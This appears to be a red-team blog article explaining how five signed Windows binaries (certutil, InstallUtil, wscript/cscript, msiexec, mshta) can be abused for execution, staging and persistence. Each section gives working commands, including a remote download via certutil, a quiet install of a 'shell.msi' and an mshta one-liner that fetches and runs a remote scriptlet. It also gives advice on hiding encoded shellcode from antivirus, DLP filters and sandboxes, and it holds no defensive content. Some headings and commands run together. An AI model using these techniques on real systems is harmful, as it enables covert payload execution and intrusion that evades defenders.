Living-off-the-land binaries (LOLbins) are native Windows executables that perform legitimate administrative functions. Because they are signed, widely deployed, and trusted by enterprise tooling, they are used by Red Teams and Threat Actors to achieve execution, staging, and persistence while blending in with the overall network noise.
This article examines five such binaries that remain operationally useful on modern Windows estates: their intended functions, operational utility for red teamers, and important behavioral constraints to account for when selecting them as part of an engagement.
1. certutil.exe
What: Windows certificate utility (encode/decode certs, import/export, can write files).
Capabilities: Download and base64 encoding / decode files.
Operational notes (offensive context only):
Commonly leveraged to transfer or stage Base64-encoded payloads and other binary data. Encoding allows operators to conceal file content from data loss prevention (DLP) or antivirus engines during transit and staging. A typical approach involves downloading encoded shellcode and maintaining it in that form until it reaches a location or context where security controls, such as antivirus or AppLocker, are less effective. If DLP mechanisms still flag the encoded file, applying multiple layers of encoding can sometimes evade single-pass decoding filters.
Commad:
certutil.exe -urlcache -f https://www.example.org/file.exe file.exe
certutil -encode file.exe file.base64
certutil -decode file.base64 file.exe
2. InstallUtil.exe
What: .NET installer utility used to install/uninstall assemblies.
Capabilities: Execute specially crafted C# application.
Operational notes (offensive context only):
Useful on hosts with execution restrictions because it leverages a trusted, signed system utility rather than introducing an unfamiliar executable. Assemblies executed through InstallUtil often behave differently under security controls, and the installer/uninstaller model can reduce the amount of observable activity during initial inspection. Since installer classes are only invoked when InstallUtil triggers them, the underlying assembly may appear inert when inspected or detonated in basic automated sandboxes. This discrepancy can limit how much behavioral data security products collect prior to execution through the LOLBin, which is why this technique is so powerful.
Commad:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U malicious.exe3. wscript.exe / cscript.exe
What: Windows Script Host runs VBScript and JScript files.
Capabilities: Execute script logic natively on Windows, with access to COM automation and other legacy automation interfaces.
Operational notes (offensive context only):
Script hosts remain relevant because they can execute JScript or VBScript directly through a trusted Windows component. This allows operators to run custom logic in a way that resembles normal system scripting activity, reducing the need for introducing unusual binaries. JScript-based loaders or bootstrap logic executed through wscript.exe or cscript.exe typically blend into environments where legacy scripting is still present, making them useful in estates that rely on older automation frameworks. The file is a basic text file, this means it raises less suspicion than something like an executable.
Commad:
Wscript.exe Shell.js4. msiexec.exe
What: Windows Installer engine responsible for installing, configuring, and removing MSI packages.
Capabilities: Execute installation routines and custom actions defined within MSI packages or transforms.
Operational notes (offensive context only):
Valuable in scenarios where activity must resemble legitimate software installation workflows. MSI packages provide a structured container for embedding logic, and executions through msiexec inherit the credibility associated with normal deployment operations. This alignment with administrative behaviour can make it suitable for staged execution in environments where conventional executable launches would stand out. Its operational utility is strongest where software deployment is frequent and loosely governed.
Commad:
msiexec /quiet /i shell.msi5. mshta.exe
What: Microsoft HTML Application Host for executing HTA files and HTML-based script content.
Capabilities: Run HTML, JavaScript, and VBScript as application logic through a native Windows host.
Operational notes (offensive context only):
Well suited for lightweight staging because it accepts script-based input and can interpret it directly without the need for compiled binaries. Its ability to execute HTML-based logic offers flexibility for bootstrapping or orchestrating follow-on components, particularly in environments where script content is less scrutinized than executables. Behaviour varies by Windows version, so its reliability is tied to understanding the specific platform characteristics of the target estate.
Commad:
mshta.exe javascript:a=GetObject("script:https://www.github.com/shell.sct").Exec();close();
Download Only - Lands in INetCache:
mshta.exe https://www.github.com/shell.extConclusion
LOLbins are not disappearing; their relevance will only increase as Windows continues to rely on signed, built-in utilities for core functionality. Operators should be familiar with multiple categories of LOLbins so they can adapt to different environments and apply the right tool for the constraints they encounter. Their widespread availability and trusted signatures make them valuable for low-visibility execution, staging, and workflow integration across a range of enterprise estates.